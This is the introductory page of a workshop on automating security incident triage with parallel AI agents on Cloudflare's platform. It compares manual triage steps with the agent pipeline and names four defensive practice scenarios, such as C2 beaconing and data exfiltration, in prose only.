What does a SIRT team do?
A Security Incident Response Team (SIRT) is the group of analysts responsible for detecting, triaging, investigating, and responding to security incidents across an organization. When an alert fires — malware detected on a workstation, a phishing email reported, suspicious login activity from an unusual country, or data leaving the network in unexpected volumes — SIRT is on the clock.
Their job is to answer three questions as fast as possible:
- Is this real? — Distinguish true positives from noise.
- How bad is it? — Determine scope, severity, and blast radius.
- What do we do? — Recommend containment, remediation, and escalation steps.
Every minute matters. A delayed triage can mean the difference between isolating a compromised host and watching an attacker pivot laterally across the network.
The problem: manual triage is slow
Today, most SIRT workflows look like this:
| Step | What the analyst does | Time |
|---|---|---|
| 1. Read the alert | Open the SIEM, read raw log data | 3–5 min |
| 2. Pivot to identity tools | Look up the user in Active Directory, check MFA status | 5–8 min |
| 3. Check network reputation | Query VirusTotal, AbuseIPDB, or internal threat intel feeds | 5–10 min |
| 4. Analyze command-line activity | Review EDR telemetry for suspicious processes | 5–10 min |
| 5. Correlate across sources | Mentally stitch together findings from 4+ tools | 5–10 min |
| 6. Write the triage card | Summarize findings, assign severity, recommend actions | 5–10 min |
| Total | ~30–60 min |
That’s 30–60 minutes per incident, with constant context-switching between tools. Analysts handle dozens of alerts per shift. Fatigue leads to missed signals. Burnout is real.
The agentic solution: parallel AI analysis
What if you could throw the incident at a team of specialized AI agents that work in parallel — each one analyzing a different dimension of the incident — and synthesize the results into a triage card in under 60 seconds?
That’s what you’ll build in this workshop.
Before (manual):
- One analyst, working serially across 4+ tools
- ~45 minutes per incident
- High cognitive load, easy to miss correlations
After (agentic):
- A Coordinator agent dispatches 4 specialist sub-agents in parallel
- A Triage Synthesizer combines their findings into a structured triage card
- A Response Agent generates a concrete action plan
- ~60 seconds end-to-end
Manual vs Agentic Triage
flowchart LR subgraph manual["Manual — ~45 min (serial)"] direction LR A1[Analyst] --> A2[EDR] A2 --> A3[SIEM] A3 --> A4[Threat Intel] A4 --> A5[DNS/WHOIS] A5 --> A6[Write Report] end subgraph agentic["Agentic — <60s (parallel)"] direction LR B1[Incident] --> B2[Coordinator] B2 --> B3[Cmd-Line] B2 --> B4[Identity] B2 --> B5[Network] B2 --> B6[Activity] B3 --> B7[Synthesizer] B4 --> B7 B5 --> B7 B6 --> B7 B7 --> B8[Action Plan] end
The four incident scenarios
Throughout this workshop, you’ll work with four realistic incident scenarios seeded into your database:
- Malware + Command & Control — A workstation running encoded PowerShell commands and beaconing to a known C2 IP address.
- Phishing + Business Email Compromise — A user clicked a credential-harvesting link and their mailbox is now forwarding to an external address.
- Anomalous Authentication — A service account authenticating from three countries within 10 minutes with impossible travel patterns.
- Data Exfiltration — Large volumes of data uploaded to an unapproved cloud storage provider outside business hours.
Each scenario exercises different analytical dimensions and will be analyzed by different combinations of sub-agents.
What you’ll build with — the Cloudflare primitives
Each lesson introduces one Cloudflare building block. Here’s a preview:
| Primitive | What it does in this workshop |
|---|---|
| Workers | Hosts your analyst console app at the edge — both the UI and the API |
| D1 | Stores the incident queue in a serverless SQL database accessed via binding |
| Durable Objects | Gives each incident its own persistent stateful session that survives reloads |
| Workers AI | Runs LLM inference at the edge for analyzing incident telemetry |
| Agents SDK | Orchestrates the multi-agent harness — coordinator, sub-agents, and synthesis |
| Sandbox SDK | Executes CLI commands (network lookups, hash checks) in an isolated sandbox |
| Dynamic Workers | Generates and deploys custom Worker code at runtime for automated response |
You don’t need to know any of these in advance. Each lesson introduces one primitive with hands-on exercises.